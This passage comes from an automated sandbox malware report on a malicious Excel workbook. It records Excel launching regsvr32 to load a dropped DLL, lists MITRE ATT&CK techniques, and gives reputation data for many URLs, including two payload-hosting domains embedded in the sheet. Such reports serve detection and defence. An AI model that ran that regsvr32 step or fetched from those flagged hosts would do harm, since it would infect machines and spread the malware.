Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\gihi1.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: regsvr32.exe, 00000002.00000002.239892970.0000000004650000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: regsvr32.exe, 00000002.00000002.239892970.0000000004650000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: regsvr32.exe, 00000002.00000002.239892970.0000000004650000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: regsvr32.exe, 00000002.00000002.239892970.0000000004650000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting2DLL Side-Loading1Process Injection1Regsvr321OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsDLL Side-Loading1Masquerading1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting2LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
carpascapital.com2%VirustotalBrowse
gruasphenbogota.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://gruasphenbogota.com/C74hwGGxi/ka.html7%VirustotalBrowse
https://gruasphenbogota.com/C74hwGGxi/ka.html100%Avira URL Cloudmalware
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://carpascapital.com/gBPg8MtsGbv/ka.html%0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
carpascapital.com
50.116.92.246
truefalseunknown
gruasphenbogota.com
50.116.92.246
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
    high
    https://login.microsoftonline.com/5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
      high
      https://shell.suite.office.com:14435BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
          high
          https://autodiscover-s.outlook.com/5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
              high
              https://cdn.entity.5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                    high
                    https://powerlift.acompli.net5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v15BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                      high
                      https://cortana.ai5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                high
                                https://api.aadrm.com/5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                      high
                                      https://cr.office.com5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                        high
                                        https://gruasphenbogota.com/C74hwGGxi/ka.htmlintlsheet1.bintrue
                                        • 7%, Virustotal, Browse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://portal.office.com/account/?ref=ClientMeControl5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                          high
                                          https://graph.ppe.windows.net5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                            high
                                            https://res.getmicrosoftkey.com/api/redemptionevents5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://powerlift-frontdesk.acompli.net5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://tasks.office.com5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                              high
                                              https://officeci.azurewebsites.net/api/5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/work5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                high
                                                https://store.office.cn/addinstemplate5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                  high
                                                  https://globaldisco.crm.dynamics.com5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                    high
                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                      high
                                                      https://store.officeppe.com/addinstemplate5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://dev0-api.acompli.net/autodetect5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.odwebp.svc.ms5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://api.powerbi.com/v1.0/myorg/groups5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                        high
                                                        https://web.microsoftstream.com/video/5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                          high
                                                          https://graph.windows.net5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                            high
                                                            https://dataservice.o365filtering.com/5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://officesetup.getmicrosoftkey.com5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://analysis.windows.net/powerbi/api5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                              high
                                                              https://prod-global-autodetect.acompli.net/autodetect5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://outlook.office365.com/autodiscover/autodiscover.json5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                high
                                                                https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                  high
                                                                  https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                    high
                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                      high
                                                                      https://ncus.contentsync.5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                        high
                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                          high
                                                                          http://weather.service.msn.com/data.aspx5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                            high
                                                                            https://apis.live.net/v5.0/5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                              high
                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                high
                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                  high
                                                                                  https://management.azure.com5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                    high
                                                                                    https://wus2.contentsync.5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://incidents.diagnostics.office.com5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                      high
                                                                                      https://clients.config.office.net/user/v1.0/ios5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                        high
                                                                                        https://insertmedia.bing.office.net/odc/insertmedia5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                          high
                                                                                          https://o365auditrealtimeingestion.manage.office.com5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                            high
                                                                                            https://outlook.office365.com/api/v1.0/me/Activities5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                              high
                                                                                              https://api.office.net5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                high
                                                                                                https://incidents.diagnosticssdf.office.com5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                  high
                                                                                                  https://asgsmsproxyapi.azurewebsites.net/5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://clients.config.office.net/user/v1.0/android/policies5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                    high
                                                                                                    https://entitlement.diagnostics.office.com5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                      high
                                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                        high
                                                                                                        https://outlook.office.com/5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                          high
                                                                                                          https://storage.live.com/clientlogs/uploadlocation5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                            high
                                                                                                            https://templatelogging.office.com/client/log5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                              high
                                                                                                              https://outlook.office365.com/5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                high
                                                                                                                https://webshell.suite.office.com5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                  high
                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                    high
                                                                                                                    https://carpascapital.com/gBPg8MtsGbv/ka.html%intlsheet1.binfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://management.azure.com/5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                      high
                                                                                                                      https://login.windows.net/common/oauth2/authorize5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                        high
                                                                                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://graph.windows.net/5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                          high
                                                                                                                          https://api.powerbi.com/beta/myorg/imports5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                            high
                                                                                                                            https://devnull.onenote.com5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                              high
                                                                                                                              https://ncus.pagecontentsync.5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                                high
                                                                                                                                https://messaging.office.com/5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://augloop.office.com/v25BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://skyapi.live.net/Activity/5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://clients.config.office.net/user/v1.0/mac5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.o365filtering.com5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://api.cortana.ai5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://onedrive.live.com5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://ovisualuiapp.azurewebsites.net/pbiagave/5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://visio.uservoice.com/forums/368202-visio-on-devices5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://directory.services.5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://login.windows-ppe.net/common/oauth2/authorize5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drfalse
                                                                                                                                                high

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                50.116.92.246
                                                                                                                                                carpascapital.comUnited States
                                                                                                                                                46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                Analysis ID:439114
                                                                                                                                                Start date:23.06.2021
                                                                                                                                                Start time:18:05:43
                                                                                                                                                Joe Sandbox Product:CloudBasic
